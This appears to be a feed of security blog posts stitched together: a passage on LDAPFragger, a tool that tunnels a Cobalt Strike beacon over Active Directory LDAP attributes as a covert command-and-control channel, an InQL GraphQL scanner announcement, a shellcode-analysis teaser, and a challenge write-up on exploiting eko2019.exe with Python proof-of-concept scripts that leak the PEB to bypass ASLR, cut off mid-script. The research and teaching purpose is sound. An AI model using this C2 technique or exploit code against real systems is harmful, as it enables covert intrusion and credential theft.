The way this is done is the same as with sharing the name of the data-attribute. When the tool is started, all domain controllers are queried and stored in a hashtable, together with the CRC representation of the fully qualified domain name (FQDN) of the domain controller. The hash of the domain controller that has been selected is shared with the other client and resolved to the actual FQDN of the domain controller.

Initially sharing data
We now have an attribute to exchange data, we can share the name of the attribute in an obfuscated way and we can avoid replication issues by communicating to the same domain controller. All this information needs to be shared before communication can take place.
Obviously, we cannot share this information if the attribute to exchange data with has not been communicated yet (sort of a chicken-egg problem).

The solution for this is to make use of some old attributes that can act as a placeholder. For the tool, we chose to make use of one the following attributes:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

These attributes are part of the Personal-Information property set, and have been part of that since Windows 2000 Server. One of these attributes is selected at random to store the initial data.
We figured that the chance that people will actually use these attributes are low, but time will tell if that is really the case 😉

Message feedback
If we send a message over LDAP, we do not know if the message has been received correctly and if the integrity has been maintained during the transmission. To know if a message has been received correctly, another attribute will be selected – in the exact same way as the data-attribute – that is used to exchange information regarding that message. In this attribute, a CRC checksum is stored and used to verify if the correct message has been received.

In order to send a message between the two clients – Alice and Bob –, Alice would first calculate the CRC value of the message that she is about to send herself, before she sends it over to Bob over LDAP. After she sent it to Bob, Alice will monitor Bob’s CRC attribute to see if it contains data. If it contains data, Alice will verify whether the data matches the CRC value that she calculated herself. If that is a match, Alice will know that the message has been received correctly.
If it does not match, Alice will wait up until 1 second in 100 millisecond intervals for Bob to post the correct CRC value.

6

The process on the receiving end is much simpler. After a new message has been received, the CRC is calculated and written to the CRC attribute after which the message will be processed.

7

Fragmentation
Another challenge that we needed to overcome is that the maximum length of the attribute will probably be smaller than the length of the message that is going to be sent over LDAP. Therefore, messages that exceed the maximum length of the attribute need to be fragmented.
The message itself contains the actual data, number of parts and a message ID for tracking purposes. This is encoded into a base64 string, which will add an additional 33% overhead.
The message is then fragmented into fragments that would fit into the attribute, but for that we need to know how much information we can store into said attribute.
Every attribute has a different maximum length, which can be looked up in the Active Directory schema. The screenshot below displays the maximum length of the info-attribute, which is 1024.

8

At the start of the tool, attribute information such as the name and the maximum length of the attribute is saved. The maximum length of the attribute is used to fragment messages into the correct size, which will fit into the attribute. If the maximum length of the data-attribute is 1024 bytes, a message of 1536 will be fragmented into a message of 1024 bytes and a message of 512 bytes.
After all fragments have been received, the fragments are put back into the original message. By also using CRC, we can send big files over LDAP. Depending on the maximum length of the data-attribute that has been selected, the transfer speed of the channel can be either slow or okay.

Autodiscover
The working of the LDAP channel depends on (user) accounts. Preferably, accounts should not be statically configured, so we needed a way for clients both finding each other independently.
Our ultimate goal was to route a Cobalt Strike beacon over LDAP. Cobalt Strike has an experimental C2 interface that can be used to create your own transport channel. The external C2 server will create a DLL injectable payload upon request, which can be injected into a process, which will start a named pipe server. The name of the pipe as well as the architecture can be configured. More information about this can be read at the following location: https://www.cobaltstrike.com/help-externalc2

Until now, we have gathered the following information:

  • 8 bytes – Hash of data-attribute
  • 8 bytes – Hash of CRC-attribute
  • 8 bytes – Hash of domain controller FQDN

Since the name of the pipe as well as the architecture are configurable, we need more information:

  • 8 bytes – Hash of the system architecture
  • 8 bytes – Pipe name

The hash of the system architecture is collected in the same way as the data, CRC and domain controller attribute. The name of the pipe is a randomized string of eight characters. All this information is concatenated into a string and posted into one of the placeholder attributes that we defined earlier:

  • primaryInternationalISDNNumber;
  • otherFacsimileTelephoneNumber;
  • primaryTelexNumber.

The tool will query the Active Directory domain for accounts where one of each of these attributes contains data. If found and parsed successfully, both clients have found each other but also know which domain controller is used in the process, which attribute will contain the data, which attribute will contain the CRC checksums of the data that was received but also the additional parameters to create a payload with Cobalt Strike’s external C2 listener. After this process, the information is removed from the placeholder attribute.
Until now, we have not made a distinction between clients. In order to make use of Cobalt Strike, you need a workstation that is allowed to create outbound connections. This workstation can be used to act as an implant to route the traffic over LDAP to another workstation that is not allowed to create outbound connections. Visually, it would something like this.

9

Let us say that we have our tool running in segment A and segment B – Alice and Bob. All information that is needed to communicate over LDAP and to generate a payload with Cobalt Strike is already shared between Alice and Bob. Alice will forward this information to Cobalt Strike and will receive a custom payload that she will transfer to Bob over LDAP. After Bob has received the payload, Bob will start a new suspended child process and injects the payload into this process, after which the named pipe server will start. Bob now connects to the named pipe server, and sends all data from the pipe server over LDAP to Alice, which on her turn will forward it to Cobalt Strike. Data from Cobalt Strike is sent to Alice, which she will forward to Bob over LDAP, and this process will continue until the named pipe server is terminated or one of the systems becomes unavailable for whatever reason. To visualize this in a nice process flow, we used the excellent format provided in the external C2 specification document.

10

After a new SMB beacon has been spawned in Cobalt Strike, you can interact with it just as you would normally do. For example, you can run MimiKatz to dump credentials, browse the local hard drive or start a VNC stream.
The tool has been made open source. The source code can be found here: https://github.com/fox-it/LDAPFragger

11

The tool is easy to use: Specifying the cshost and csport parameter will result in the tool acting as the proxy that will route data from and to Cobalt Strike. Specifying AD credentials is not necessary if integrated AD authentication is used. More information can be found on the Github page. Please do note that the default Cobalt Strike payload will get caught by modern AVs. Bypassing AVs is beyond the scope of this blogpost.

Why a C2 LDAP channel?

This solution is ideal in a situation where network segments are completely segmented and firewalled but still share the same Active Directory domain. With this channel, you can still create a reliable backdoor channel to parts of the internal network that are otherwise unreachable for other networks, if you manage to get code execution privileges on systems in those networks. Depending on the chosen attribute, speeds can be okay but still inferior to the good old reverse HTTPS channel. Furthermore, no special privileges are needed and it is hard to detect.

Remediation

In order to detect an LDAP channel like this, it would be necessary to have a baseline identified first. That means that you need to know how much traffic is considered normal, the type of traffic, et cetera. After this information has been identified, then you can filter out the anomalies, such as:

Monitor the usage of the three static placeholders mentioned earlier in this blogpost might seem like a good tactic as well, however, that would be symptom-based prevention as it is easy for an attacker to use different attributes, rendering that remediation tactic ineffective if attackers change the attributes.

InQL Scanner

25 March 2020 at 23:00

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed-up GraphQL security testing efforts. We’re excited to announce that InQL is available on Github.

Doyensec Loves GraphQL

InQL can be used as a stand-alone script, or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages GraphQL built-in introspection query to dump queries, mutations, subscriptions, fields, arguments and retrieve default and custom objects. This information is collected and then processed to construct API endpoints documentation in the form of HTML and JSON schema. InQL is also able to generate query templates for all the known types. The scanner has the ability to identify basic query types and replace them with placeholders that will render the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the template generation by sending those requests to Burp’s Repeater tool
  • Configure the tool by using a custom settings tab

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

  • Download the latest Jython Jar
  • Download the latest version of InQL scanner
  • Start Burp Suite
  • Extender Tab > Options > Python Enviroment > Set the location of Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Extension File > Set the location of inql_burp.py > Next
  • The output window should display the following message: InQL Scanner Started!

In the next future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin functionalities.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed on one of the numerous exposed APIs, e.g anilist.co endpoints:

$ $ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedbacks that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, hence we expect to continue our research efforts in this space. Going forward, we will keep improving detection and make the tool more stable.

This project was made with love in the Doyensec Research island.

SLAE – Assignment #5: Metasploit Shellcode Analysis

By: voidsec
26 March 2020 at 13:52

Assignment #5: Metasploit Shellcode Analysis Fifth SLAE’s assignment requires to dissect and analyse three different Linux x86 Metasploit Payload. Metasploit currently has 35 different payloads but almost half of it are Meterpreter version, thus meaning staged payloads. I’ve then decided to skip meterpreter payloads as they involve multiple stages and higher complexity that will break […]

The post SLAE – Assignment #5: Metasploit Shellcode Analysis appeared first on VoidSec.

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact the I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as that eko2019.exe seems to accept a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of the local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicatory that the string of Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.

This is how this check is executed, in IDA.

Number three, is the variable local_20’s size is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data recieved in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement local_258 + uVar2 == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same forumla above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not go have gone through (since 0x199 is not a multiple of 8)!

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);
  • hProcess in this case is will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There are something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the unkown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), with the value of RAX tacked on, is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at ek2010.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the decompiled code from Ghidra that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the value of RAX + RCX!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProccess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

The fifth argument is located at RSP + 0x20. This is what the __fastcall calling convention defaults to after four arguments. Each argument after 5th will start at the location of RSP + 0x20. Each subsequent argument will be placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which is located in the R8 register, to the location of sub_140001000 (eko2019.exr+0x1000).

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [ecx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particuraly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primtive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer stored into RCX
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, lets start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of kernel mode objects.

Why is this relevant this you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from this previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very prudent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

# The GS segment register gives us access to the PEB at an offset of 0x60
exploit += "\x65"

# \x60 will be moved in gs:[rcx] (\x41's are padding)
exploit += "\x41\x41\x41\x41\x41\x41\x41\x60"

# Must be a multiple of 8- so null bytes to compensate for the other 7 bytes
exploit += "\x00\x00\x00\x00\x00\x00\x00"

# Message needs to be 528 bytes total
exploit += "\x41" * (544-len(exploit))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Indexing the response to view RAX (PEB)
receive = s.recv(1024)
peb_unpack = struct.unpack_from('<Q', receive)
peb_addr = peb_unpack[0]

print "[+] PEB is located at: {0}".format(hex(peb_addr))

# Closing the connection
s.close()

As you can see from the image below, when we hit the move operation and we have got the correct instruction in place.

RAX now contains the value of PEB!

In addition, our remote client has been able to save the PEB into a variable, which means we can always dynamically resolve this value. Note that this value will always change after the application (process) is restarted.

What is most devastating about identifying the PEB of eko2019.exe, is that the base address for the current process (eko2019.exe in this case) is located at an offset of PEB+0x10

Essentially, all we have to do is use our ability to control RCX to load the value of PEB+0x10 into it. At that point, the application will extract that value into RAX (what PEB+0x10 points to). The data PEB+0x10 points to is the actual base virtual address for eko2019.exe! This value will then be returned to the client, via RAX. This will be done with a second request! Note that this time we do not need to access the GS segment register (in the second request). If you can recall, before we accessed the GS segment register, the program naturally executed a mov rax, qword ptr[rcx] instruction. To ensure this is the instruction executed this time, we will use our byte we control to implement a NOP- to slide into the intended instruction.

As mentioned earlier, we will close our first connection to the client, and then make a second request! This update to the exploit development process is outlined in the updated proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes

# 512 byte offset to the byte we control
exploit += "\x41" * 512

